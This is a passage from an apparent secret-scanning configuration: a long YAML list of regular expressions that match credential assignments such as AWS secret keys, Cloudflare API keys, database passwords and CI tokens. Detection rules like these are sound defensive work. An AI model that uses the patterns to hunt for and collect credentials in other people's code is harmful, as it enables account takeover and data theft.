\"(?i)[\\\"']?database[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?database[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?database[_-]?port[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?database[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?database[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?database[_-]?host[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?danger[_-]?github[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cypress[_-]?record[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?coverity[_-]?scan[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?coveralls[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?coveralls[_-]?repo[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?coveralls[_-]?api[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cos[_-]?secrets[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?conversation[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?conversation[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?v2[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?test[_-]?org[_-]?cma[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?php[_-]?management[_-]?test[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?integration[_-]?management[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?cma[_-]?test[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?contentful[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?consumerkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?consumer[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?conekta[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?coding[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?codecov[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?codeclimate[_-]?repo[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?codacy[_-]?project[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cocoapods[_-]?trunk[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cocoapods[_-]?trunk[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cn[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cn[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?clu[_-]?ssh[_-]?private[_-]?key[_-]?base64[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?clu[_-]?repo[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudinary[_-]?url[_-]?staging[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudinary[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudflare[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudflare[_-]?auth[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudflare[_-]?auth[_-]?email[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudflare[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?service[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?processed[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?parsed[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?order[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?instance[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?audited[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloudant[_-]?archived[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cloud[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?clojars[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cli[_-]?e2e[_-]?cma[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?claimr[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?claimr[_-]?superuser[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?claimr[_-]?db[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?claimr[_-]?database[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ci[_-]?user[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ci[_-]?server[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ci[_-]?registry[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ci[_-]?project[_-]?url[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ci[_-]?deploy[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?chrome[_-]?refresh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?chrome[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cheverny[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cf[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?certificate[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?censys[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cattle[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cattle[_-]?agent[_-]?instance[_-]?auth[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cattle[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cargo[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?cache[_-]?s3[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bx[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bx[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bundlesize[_-]?github[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?built[_-]?branch[_-]?deploy[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?browserstack[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?browser[_-]?stack[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?brackets[_-]?repo[_-]?oauth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?username[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?pwd[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?pass[_-]?prod[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?auth[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bluemix[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bintraykey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bintray[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bintray[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bintray[_-]?gpg[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bintray[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?bintray[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?b2[_-]?bucket[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?b2[_-]?app[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?awssecretkey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?awscn[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?awscn[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?awsaccesskeyid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?ses[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?ses[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?secrets[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?config[_-]?secretaccesskey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?config[_-]?accesskeyid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aws[_-]?access[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?author[_-]?npm[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?author[_-]?email[_-]?addr[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?auth0[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?auth0[_-]?api[_-]?clientsecret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?auth[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?assistant[_-]?iam[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?artifacts[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?artifacts[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?artifacts[_-]?bucket[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?artifacts[_-]?aws[_-]?access[_-]?key[_-]?id[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?artifactory[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?argos[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?apple[_-]?id[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?appclientsecret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?app[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?app[_-]?secrete[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?app[_-]?report[_-]?token[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?app[_-]?bucket[_-]?perm[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?apigw[_-]?access[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?apiary[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?api[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?api[_-]?key[_-]?sid[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?api[_-]?key[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aos[_-]?sec[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?aos[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?ansible[_-]?vault[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?android[_-]?docs[_-]?deploy[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?anaconda[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?amazon[_-]?secret[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?amazon[_-]?bucket[_-]?name[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?alicloud[_-]?secret[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?alicloud[_-]?access[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?alias[_-]?pass[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 